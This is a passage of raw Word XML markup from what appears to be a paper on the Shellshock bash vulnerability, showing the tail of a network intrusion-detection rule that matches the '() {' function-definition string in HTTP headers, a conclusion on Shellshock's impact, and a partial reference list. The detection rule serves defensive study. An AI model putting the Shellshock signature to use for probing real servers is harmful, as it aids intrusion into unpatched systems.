          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flow:established,to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">_ server; content:”() {“; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>threshold:type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> limit, track </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by_src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, count 1, seconds 120; sid:2014092401;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Shellshock is such a widespread, easily exploited, high impact bug.  Yet it has been there over two decades without noticing. Up on its publication, millions of attacks targeting Shellshock were detected in just a few days. Many kinds of </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">typical </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacking methods are revealed. Although patches have been published and other counter measures have been suggested, there must be a myriad of systems still not fixed due to various reasons. Thus Shellshock attacks could be expected to keep bringing damage in a long period. Besides, more related vulnerabilities could still be discovered in the future. </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Therefore, persi</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tent, keen</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attention must be paid to the possible new threats related to Shellshock. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Perlroth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, Nicole (25 September 2014). </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink2"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>"Security Experts Expect ‘Shellshock’ Software Bug in Bash to Be Significant"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink3"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>New York Times</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Retrieved 25 September 2014.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00F242CC" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005E78FF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">National Vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F242CC" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6271.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F242CC" w:rsidRDefault="00F242CC" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6271.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Gallagher, Sean (26 September 2014). </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">"Still more </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>vulnerabilities</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> in bash? Shellshock becomes whack-a-mole"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink3"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Arstechnica</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieved 26 September 2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523" w:rsidP="00F242CC">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Summary </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2014-7169.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-7169.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C234D" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C234D" w:rsidRDefault="002C234D">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C234D" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7177.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C234D" w:rsidRDefault="002C234D">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6277.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
